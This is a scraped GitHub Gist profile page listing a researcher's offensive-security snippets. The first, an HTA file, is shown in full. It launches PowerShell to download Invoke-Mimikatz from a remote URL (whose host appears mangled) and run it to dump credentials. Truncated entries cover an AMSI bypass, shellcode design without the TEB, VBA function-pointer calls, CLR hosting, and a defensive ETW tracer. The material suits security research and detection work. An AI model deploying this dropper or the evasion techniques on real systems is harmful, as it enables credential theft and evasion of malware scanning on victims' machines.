Skip to content

Instantly share code, notes, and snippets.

View aaaddress1's full-sized avatar
🤗
buy me a beer plz 🍺

Sheng-Hao Ma aaaddress1

🤗
buy me a beer plz 🍺
1.4k followers · 36 following
View GitHub Profile
@aaaddress1
aaaddress1 / invokeMimikatz.hta
Created December 16, 2021 08:08
invokeMimikatz.hta
<html>
<head>
<HTA:APPLICATION ID="HelloExample">
<script language="jscript">
var c = "powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
new ActiveXObject('WScript.Shell').Run(c);
</script>
</head>
<body>
<script>self.close();</script>
@aaaddress1
aaaddress1 / peParser.cpp
Created December 2, 2021 13:02
#include <windows.h>
#include <iostream>
bool readBinFile(const char fileName[], char*& bufPtr, DWORD& length) {
if (FILE* fp = fopen(fileName, "rb")) {
fseek(fp, 0, SEEK_END);
length = ftell(fp);
bufPtr = new char[length + 1];
fseek(fp, 0, SEEK_SET);
fread(bufPtr, sizeof(char), length, fp);
@aaaddress1
aaaddress1 / How to use a function pointer in VBA.md
Created November 18, 2021 15:26 — forked from sancarn/How to use a function pointer in VBA.md
How to use a function pointer in VBA by Akihito Yamashiro

VB6 and VBA come with no support for function pointers.

Also, when you wish to execute a function in a dll using the Declare function, you can only call functions created by the Steadcall calling conversation.

These constraints can be avoided by using the DispCallFunc API. The DispCallFunc is widely used in VB6 when erasing the history of IE. Although the DispCallFunc is known as API for calling the IUnknown interface, in fact, you can also perform other functions other than COM by passing the NULL to the first argument.

As explained in the http://msdn.microsoft.com/en-us/library/ms221473(v=vs.85).aspx , the DispCallFunc argument is as follows.

@aaaddress1
aaaddress1 / x64FunctionPointer.vba
Created November 18, 2021 15:22 — forked from rmdavy/x64FunctionPointer.vba
x64FunctionPointerExample
Declare PtrSafe Function DispCallFunc Lib "OleAut32.dll" (ByVal pvInstance As LongPtr, ByVal offsetinVft As LongPtr, ByVal CallConv As Long, ByVal retTYP As Integer, ByVal paCNT As Long, ByRef paTypes As Integer, ByRef paValues As LongPtr, ByRef retVAR As Variant) As Long
Declare PtrSafe Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As LongPtr
Declare PtrSafe Function GetProcAddress Lib "kernel32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr
Const CC_STDCALL = 4
Private VType(0 To 63) As Integer, VPtr(0 To 63) As LongPtr
Sub SayHello()
@aaaddress1
aaaddress1 / x64FunctionPointer1.vba
Created November 18, 2021 15:21 — forked from rmdavy/x64FunctionPointer1.vba
x64FunctionPointerExample2
Declare PtrSafe Function DispCallFunc Lib "OleAut32.dll" (ByVal pvInstance As LongPtr, ByVal offsetinVft As LongPtr, ByVal CallConv As Long, ByVal retTYP As Integer, ByVal paCNT As Long, ByRef paTypes As Integer, ByRef paValues As LongPtr, ByRef retVAR As Variant) As Long
Declare PtrSafe Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As LongPtr
Declare PtrSafe Function GetProcAddress Lib "kernel32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr
Const CC_STDCALL = 4
Private VType(0 To 63) As Integer, VPtr(0 To 63) As LongPtr
Sub SayHello()
@aaaddress1
aaaddress1 / memBruteforce.cpp
Last active February 20, 2024 11:16
Windows 32-bit Shellcode Design without TEB & fs:30h
// memBruteforce.cpp by [email protected]
// brute search loaded moudules in memory
// rewrite from https://www.exploit-db.com/exploits/45293
#include <Windows.h>
#include <iostream>
#pragma warning(disable:4996)
bool isMemExist(size_t addr) {
int retv;
__asm {
@aaaddress1
aaaddress1 / veh_AmsiBypass.cpp
Created July 20, 2021 03:07
(VEH) AMSI Bypass without Memory Patch
// Exception-Based AMSI Bypass
// by [email protected]
#include <amsi.h>
#include <iostream>
#include <Windows.h>
#pragma comment(lib, "amsi.lib")
#pragma comment(lib, "ole32.lib")
#pragma warning( disable : 4996 )
#define AMSIPROJECTNAME L"scanner"
@aaaddress1
aaaddress1 / clrHosting_v4.0.cpp
Last active March 22, 2024 14:50
CLR Hosting: running dotNet binary in C/C++ & rewrite from .NET(4+) COM interface
// CLR Hosting, by [email protected]
//
// it's a new edition rewrite for .NET(4+) COM interface
// original from github.com/etormadiv/HostingCLR
// & blog.xpnsec.com/hiding-your-dotnet-etw
//
// this PoC supports the following .NET entry:
// >>>> static void Main(string[] args);
//
#include <stdio.h>
@aaaddress1
aaaddress1 / win_iPython_ps1.md
Last active June 23, 2021 11:03
Guide: Install iPython on Windows 10 via PowerShell

Install iPython on Windows 10 (PowerShell Script)

Install Python 3.7

mkdir C:/temp/ [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest -Uri "https://www.python.org/ftp/python/3.7.0/python-3.7.0.exe" -OutFile "c:/temp/python-3.7.0.exe" c:/temp/python-3.7.0.exe /quiet InstallAllUsers=0 PrependPath=1 Include_test=0

Install iPyhton

@aaaddress1
aaaddress1 / dotnet-runtime-etw.py
Created June 22, 2021 15:08 — forked from countercept/dotnet-runtime-etw.py
A research aid for tracing security relevant events in the CLR via ETW for detecting malicious assemblies.
import time
import etw
import etw.evntrace
import sys
import argparse
import threading
class RundownDotNetETW(etw.ETW):
def __init__(self, verbose, high_risk_only):